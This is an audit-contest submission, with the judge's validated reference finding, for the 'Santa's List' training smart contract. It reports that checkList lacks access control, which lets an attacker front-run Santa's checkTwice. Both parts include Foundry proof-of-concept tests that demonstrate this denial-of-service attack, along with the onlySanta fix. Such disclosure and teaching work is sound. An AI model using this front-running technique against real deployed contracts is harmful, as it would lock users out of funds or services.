Santa's List
AI First Flight #3
Beginner FriendlyFoundry
EXP
View results
Previous Next
Submission Details
Severity: high
Valid

Permanent Status Poisoning via Front-Running Santa's checkTwice

rensley

Root + Impact

Description

  • The two-phase checking system (checkList then checkTwice) creates a critical race condition. Since checkList has no access control, an attacker can monitor the mempool for Santa's checkTwice transactions and front-run them by calling checkList with a different status.

  • This causes checkTwice to revert due to the status mismatch check, permanently blocking Santa from confirming any user's status.

  • The attacker can repeat this indefinitely, making the entire protocol unusable.

// Root cause in the codebase with @> marks to highlight the relevant section
// Anyone can call - no onlySanta modifier
function checkList(address person, Status status) external {
s_theListCheckedOnce[person] = status;
emit CheckedOnce(person, status);
}
function checkTwice(address person, Status status) external onlySanta {
@> if (s_theListCheckedOnce[person] != status) {
@> revert SantasList__SecondCheckDoesntMatchFirst();
}
s_theListCheckedTwice[person] = status;
emit CheckedTwice(person, status);
}

Risk

Likelihood: High

  • Reason 1 // Attacker monitors mempool for Santa's checkTwice transactions

  • Reason 2 // Front-running is trivial on most EVM chains

  • Reason 3 // Attack costs only gas fees, can be repeated indefinitely

Impact: High

  • Santa can NEVER successfully confirm any user's status

  • Entire protocol becomes non-functional

  • All users permanently locked out of rewards

  • No recovery mechanism without contract redeployment

  • Protocol-wide denial of service

Proof of Concept

The following test demonstrates how an attacker can permanently block Santa from confirming any user's status by front-running every checkTwice call with a status change via checkList.

function test_PermanentStatusPoisoning() public {
address attacker = makeAddr("attacker");
address victim = makeAddr("victim");
// Step 1: Santa checks user as NICE on first list
vm.prank(santa);
santasList.checkList(victim, SantasList.Status.NICE);
// Step 2: Attacker sees Santa's checkTwice(victim, NICE) in mempool
// Attacker front-runs by changing status to NAUGHTY
vm.prank(attacker);
santasList.checkList(victim, SantasList.Status.NAUGHTY);
// Step 3: Santa's checkTwice transaction executes but reverts
vm.prank(santa);
vm.expectRevert(SantasList.SantasList__SecondCheckDoesntMatchFirst.selector);
santasList.checkTwice(victim, SantasList.Status.NICE);
// Step 4: Santa tries again - sets checkList to NICE
vm.prank(santa);
santasList.checkList(victim, SantasList.Status.NICE);
// Step 5: Attacker front-runs AGAIN
vm.prank(attacker);
santasList.checkList(victim, SantasList.Status.NAUGHTY);
// Step 6: Santa's second attempt also reverts
vm.prank(santa);
vm.expectRevert(SantasList.SantasList__SecondCheckDoesntMatchFirst.selector);
santasList.checkTwice(victim, SantasList.Status.NICE);
// Attacker can repeat forever - victim NEVER gets confirmed
// Victim's final status on both lists:
assertEq(uint256(santasList.getNaughtyOrNiceOnce(victim)), uint256(SantasList.Status.NAUGHTY));
assertEq(uint256(santasList.getNaughtyOrNiceTwice(victim)), uint256(SantasList.Status.NICE)); // Default, never set
// Christmas arrives - victim cannot collect
vm.warp(santasList.CHRISTMAS_2023_BLOCK_TIME() + 1);
vm.prank(victim);
vm.expectRevert(); // Status mismatch or NAUGHTY
santasList.collectPresent();
}

Recommended Mitigation

Add the onlySanta modifier to checkList to prevent unauthorized status manipulation. Additionally, consider using a commit-reveal scheme or batch processing to make front-running impractical.

- function checkList(address person, Status status) external {
+ function checkList(address person, Status status) external onlySanta {
s_theListCheckedOnce[person] = status;
emit CheckedOnce(person, status);
}
Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge about 20 hours ago
Submission Judgement Published
Validated
Assigned finding tags:

[H-01] Anyone is able to call `checkList` function in SantasList contract and prevent any address from becoming `NICE` or `EXTRA_NICE` and collect present.

## Description With the current design of the protocol, anyone is able to call `checkList` function in SantasList contract, while documentation says only Santa should be able to call it. This can be considered as an access control vulnerability, because not only santa is allowed to make the first check. ## Vulnerability Details An attacker could simply call the external `checkList` function, passing as parameter the address of someone else and the enum Status `NAUGHTY`(or `NOT_CHECKED_TWICE`, which should actually be `UNKNOWN` given documentation). By doing that, Santa will not be able to execute `checkTwice` function correctly for `NICE` and `EXTRA_NICE` people. Indeed, if Santa first checked a user and assigned the status `NICE` or `EXTRA_NICE`, anyone is able to call `checkList` function again, and by doing so modify the status. This could result in Santa unable to execute the second check. Moreover, any malicious actor could check the mempool and front run Santa just before calling `checkTwice` function to check users. This would result in a major denial of service issue. ## Impact The impact of this vulnerability is HIGH as it results in a broken mechanism of the check list system. Any user could be declared `NAUGHTY` for the first check at any time, preventing present collecting by users although Santa considered the user as `NICE` or `EXTRA_NICE`. Santa could still call `checkList` function again to reassigned the status to `NICE` or `EXTRA_NICE` before calling `checkTwice` function, but any malicious actor could front run the call to `checkTwice` function. In this scenario, it would be impossible for Santa to actually double check a `NICE` or `EXTRA_NICE` user. ## Proof of Concept Just copy paste this test in SantasListTest contract : ``` function testDosAttack() external { vm.startPrank(makeAddr("attacker")); // any user can checList any address and assigned status to naughty // an attacker could front run Santa before the second check santasList.checkList(makeAddr("user"), SantasList.Status.NAUGHTY); vm.stopPrank(); vm.startPrank(santa); vm.expectRevert(); // Santa is unable to check twice the user santasList.checkTwice(makeAddr("user"), SantasList.Status.NICE); vm.stopPrank(); } ``` ## Recommendations I suggest to add the `onlySanta` modifier to `checkList` function. This will ensure the first check can only be done by Santa, and prevent DOS attack on the contract. With this modifier, specification will be respected : "In this contract Only Santa to take the following actions: - checkList: A function that changes an address to a new Status of NICE, EXTRA_NICE, NAUGHTY, or UNKNOWN on the original s_theListCheckedOnce list." The following code will resolve this access control issue, simply by adding `onlySanta` modifier: ``` function checkList(address person, Status status) external onlySanta { s_theListCheckedOnce[person] = status; emit CheckedOnce(person, status); } ``` No malicious actor is now able to front run Santa before `checkTwice` function call. The following tests shows that doing the first check for another user is impossible after adding `onlySanta` modifier: ``` function testDosResolved() external { vm.startPrank(makeAddr("attacker")); // checklist function call will revert if a user tries to execute the first check for another user vm.expectRevert(SantasList.SantasList__NotSanta.selector); santasList.checkList(makeAddr("user"), SantasList.Status.NAUGHTY); vm.stopPrank(); } ```

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!